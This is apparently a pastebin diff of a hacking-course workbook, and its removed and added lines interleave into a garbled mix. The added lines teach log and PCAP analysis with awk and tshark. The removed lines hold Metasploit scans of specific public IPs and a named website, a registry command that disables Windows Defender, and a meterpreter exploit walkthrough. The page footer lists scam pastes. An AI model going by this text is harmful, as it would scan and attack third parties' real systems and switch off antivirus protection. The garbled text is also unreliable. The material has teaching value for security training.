1346	+	----------
1347	-	to running Metasploit commands.
1347	+	To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
1348
1349		-----------------------------Type this-----------------------------------------
1350		cat cisco.log \| awk '{print $5}' \| tail -n 4
1351	-	ls
1351	+	-------------------------------------------------------------------------------
1352
1353	-	pwd
1353	+
1354
1355	-	ping -c1 yahoo.com
1355	+	Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
1356
1357	-	nmap yahoo.com
1357	+	-----------------------------Type this-----------------------------------------
1358		cat cisco.log \| awk '{print $5}'\| sort \| uniq -c \| sort -rn
1359		-------------------------------------------------------------------------------
1360
1361
1362
1363	-	- You're on the outside scanning publicly accessable targets.
1363	+	While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
1364
1365		-----------------------------Type this-----------------------------------------
1366	-	---------------------------Type This-----------------------------------
1366	+	cat cisco.log \| grep %[a-zA-Z]-[0-9]-[a-zA-Z] \| awk '{print $5}' \| sort \| uniq -c \| sort -rn
1367	-	use auxiliary/scanner/portscan/tcp
1367	+	-------------------------------------------------------------------------------
1368
1369	-	set RHOSTS 217.108.137.200
1369	+
1370
1371	-	set PORTS 80,1433,1521,3306,8000,8080,8081,10000
1371	+
1372		Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
1373	-	run
1373	+
1374		-----------------------------Type this-----------------------------------------
1375		cat cisco.log \| grep %LINEPROTO-5-UPDOWN:
1376
1377		cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| awk '{print $10}' \| sort \| uniq -c \| sort -rn
1378	-	- So let's do a quick google search for someone with trace.axd file
1378	+
1379	-	- filetye:axd inurl:trace.axd
1379	+	cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| sed 's/,//g' \| awk '{print $10}' \| sort \| uniq -c \| sort -rn
1380	-	--------------------------Type This-----------------------------------
1380	+
1381	-	use auxiliary/scanner/http/ (press the tab key, then press y to look through the http options)
1381	+	cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| sed 's/,//g' \| awk '{print $10 " changed to " $14}' \| sort \| uniq -c \| sort -rn
1382	-	----------------------------------------------------------------------
1382	+	--------------------------------------------------------------------------------
1383
1384	-	- Here is an example:
1384	+
1385		##################################################################
1386	-	use auxiliary/scanner/http/trace_axd
1386	+	# Analyzing a PCAP Prads #
1387		# Note: run as regular user #
1388	-	set RHOSTS 207.20.57.112
1388	+	##################################################################
1389
1390	-	set VHOST www.motion-vr.net
1390	+	---------------------------Type this as a regular user----------------------------------
1391		cd ~
1392	-	run
1392	+
1393	-	----------------------------------------------------------------------
1393	+	cd ~/pcap_analysis/prads
1394
1395		wget http://45.63.104.73/suspicious-time.pcap
1396
1397		prads -r suspicious-time.pcap -l prads-asset.log
1398	-	---------------------------Type This-----------------------------------
1398	+
1399	-	use auxiliary/scanner/http/http_version
1399	+
1400
1401	-	set RHOSTS 45.77.162.239
1401	+	cat prads-asset.log \| grep SYN \| grep -iE 'windows\|linux'
1402
1403	-	set RPORT 80
1403	+	cat prads-asset.log \| grep CLIENT \| grep -iE 'safari\|firefox\|opera\|chrome'
1404
1405	-	run
1405	+	cat prads-asset.log \| grep SERVER \| grep -iE 'apache\|linux\|ubuntu\|nginx\|iis'
1406	-	----------------------------------------------------------------------
1406	+
1407
1408
1409	-	---------------------------Type This-----------------------------------
1409	+
1410	-	use auxiliary/scanner/http/tomcat_enum
1410	+
1411		##################################
1412	-	set RHOSTS 217.108.137.200
1412	+
1413		# Note: run as regular user #
1414	-	set RPORT 8080
1414	+
1415		---------------------------Type this as a regular user----------------------------------
1416	-	run
1416	+
1417
1418		cd ~/pcap_analysis/chaos_reader/
1419
1420	-	# Exploitation with Metasploit #
1420	+	wget http://45.63.104.73/suspicious-time.pcap
1421
1422	-	Step 1: Disable the firewall on your Windows 10 host
1422	+	wget http://45.63.104.73/chaosreader.pl
1423
1424	-	Step 2: Run your command prompt as an administrator
1424	+
1425	-	reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
1425	+
1426		cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)"
1427	-	Step 3: Restart your computer (I'm sorry - I know this sux!)
1427	+
1428		cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)" \| awk '{print $4, $5, $6}' \| sort \| uniq -c \| sort -nr
1429	-	Step 4: Start the vulnerable server (no need to turn on OllyDBG)
1429	+
1430
1431	-	Step 5: From your CentoS run the following commands
1431	+
1432
1433	-	cd ~/
1433	+
1434		**** Open a web browser and browse the the IP address of your Linux machine port 8000 for the web page ***
1435	-	wget https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
1435	+
1436		------------------------------------------------------------------------
1437	-	unzip ExploitLab.zip
1437	+
1438
1439	-	cd ExploitLab/4-AttackScripts/
1439	+
1440
1441	-	vi vulnserv.rb
1441	+
1442
1443	-	cp vulnserv.rb ~/metasploit-framework/modules/exploits/windows/misc
1443	+
1444
1445	-	cd ~/metasploit-framework/
1445	+	#############################
1446		# PCAP Analysis with tshark #
1447	-	./msfconsole
1447	+	# Note: run as regular user #
1448		#############################
1449		---------------------------Type this as a regular user---------------------------------
1450		cd ~/pcap_analysis/tshark
1451	-	use exploit/windows/misc/vulnserv
1451	+
1452	-	set PAYLOAD windows/meterpreter/bind_tcp
1452	+	wget http://45.63.104.73/suspicious-time.pcap
1453	-	set RHOST [CHANGEME-TO-YOUR-WIN10-IP]
1453	+
1454	-	set RPORT 9999
1454	+	tshark -i ens3 -r suspicious-time.pcap -qz io,phs
1455	-	exploit
1455	+
1456		tshark -r suspicious-time.pcap -qz ip_hosts,tree
1457
1458		tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" \| uniq
1459
1460		tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
1461
1462	-	###########################
1462	+
1463	-	# Client-Side Enumeration #
1463	+	tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
1464	-	###########################
1464	+
1465		whois rapidshare.com.eyu32.ru
1466
1467		whois sploitme.com.cn
1468	-	******************************** Figure out who and where you are ********************************
1468	+
1469		tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' \| grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
1470
1471		tshark -r suspicious-time.pcap -qz http_req,tree
1472	-	meterpreter> sysinfo
1472	+
1473		tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
1474
1475	-	meterpreter> getuid
1475	+	tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' \| grep -v -e '\/image' -e '.css' -e '.ico' \| grep 10.0.3.15 \| sed -e 's/\?[^cse].*/\?\.\.\./g'
1476		------------------------------------------------------------------------

Public Pastes

⭐️ EARN $500 INSTANTLY⭐ 4M
JavaScript | 1 sec ago | 0.17 KB
⭐ Binance Account hack QW
JavaScript | 4 sec ago | 0.17 KB
⭐ get any gift card for FREE⭐ 54
JavaScript | 8 sec ago | 0.17 KB
⭐ Binance Account hack OY
JavaScript | 11 sec ago | 0.17 KB
⭐ get any gift card for FREE⭐ 9N
JavaScript | 11 sec ago | 0.17 KB
⭐ FREE giftcards method 3D
JavaScript | 14 sec ago | 0.17 KB
⭐️ EARN $500 INSTANTLY J6
JavaScript | 16 sec ago | 0.17 KB
⭐ get any gift card for 6C
JavaScript | 18 sec ago | 0.17 KB